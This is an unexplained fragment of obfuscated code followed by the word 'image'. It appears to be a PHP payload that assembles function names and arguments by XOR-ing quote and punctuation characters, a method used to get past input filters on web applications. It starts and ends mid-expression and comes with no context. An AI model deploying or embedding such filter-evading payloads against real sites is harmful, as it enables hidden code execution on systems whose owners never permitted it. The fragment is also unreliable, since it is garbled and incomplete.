'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^',')))(((')'^'^'^','^'(')).(('.'^','^'('))))).'

image